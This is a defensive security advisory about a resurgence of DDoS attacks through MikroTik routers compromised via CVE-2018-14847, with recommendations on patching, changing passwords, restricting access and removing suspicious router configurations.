Alert: Resurgence of DDoS Attacks via MikroTik Routers - Protect Your Network Now

In a revealing publication from early September 2021, QRATOR Labs has shone a spotlight on a concerning trend: a new onslaught of DDoS (Distributed Denial of Service) attacks originating from a network of compromised MikroTik routers. This development is particularly alarming as it leverages vulnerabilities from a past security breach in 2018, which many believed had been conclusively addressed.

A Look Back at the Vulnerability

The root of this issue traces back to a vulnerability discovered in MikroTik's RouterOS back in 2018. Although MikroTik was quick to release a patch, it appears that devices compromised prior to the patch are still being exploited. Current attacks do not stem from a new weakness in RouterOS, nor do they involve malware hidden within the device's file system. Instead, attackers are reconfiguring RouterOS devices for remote access, utilizing the very commands and features of RouterOS against itself.

The Persistent Threat

Simply applying the patch to close the old vulnerability does not guarantee safety for these routers. If attackers had previously obtained your password, updating your system alone is insufficient. It's imperative to change your password, reevaluate your firewall settings to block unauthorized remote access, and remove any scripts that were not authorized by you.

Despite efforts to reach out, many RouterOS users remain unaware of these developments, primarily because they do not maintain regular contact with MikroTik or actively monitor their devices. MikroTik is actively exploring further solutions to enhance security.

No New Vulnerabilities

It's crucial to note that no new vulnerabilities have been identified in these devices, and RouterOS has undergone rigorous audits by several independent entities. However, vigilance and proactive measures are essential.

Recommended Protective Measures

To safeguard your network against these revived threats, consider the following actions:

• Regular Updates: Ensure your MikroTik device is running the latest software version.
• Restrict Access: Avoid open internet access to your devices. Utilize secure VPN services like IPsec for necessary remote access.
• Strong Password Policy: Implement and regularly update strong passwords.
• Monitor and Adjust Configurations: Keep an eye out for unfamiliar settings within your RouterOS configuration, which could indicate tampering.

In collaboration with cybersecurity experts, it has been discovered that certain malware attempts to reconfigure MikroTik devices through Windows computers within the same network. This revelation underscores the importance of securing your devices with strong passwords and staying on top of updates to guard against the exploitation of fixed vulnerabilities, such as CVE-2018-14847.

Specific Configurations to Watch

Be wary of the following configurations and adjust or remove them as needed:

• System Scheduler: Rules executing Fetch scripts should be eliminated.
• IP Socks Proxy: Disable this feature if it's unfamiliar or not in use.
• L2TP Clients: Remove any clients, especially those named "lvpn," if they are unrecognized.
• Firewall Rules: Any rule allowing access on port 5678 should be scrutinized and potentially removed.

Furthermore, collaborating with ISPs to block connections to malicious domains linked to these attacks can significantly enhance your network's security.

Conclusion

The resurgence of DDoS attacks exploiting MikroTik routers serves as a stark reminder of the persistent nature of cyber threats. By adopting the recommended measures, including regular updates, access restrictions, strong password policies, and vigilant monitoring of system configurations, organizations can significantly reinforce their defenses against these and future cyber threats. Stay informed, stay secure, and ensure your network's resilience against the evolving landscape of cyber attacks.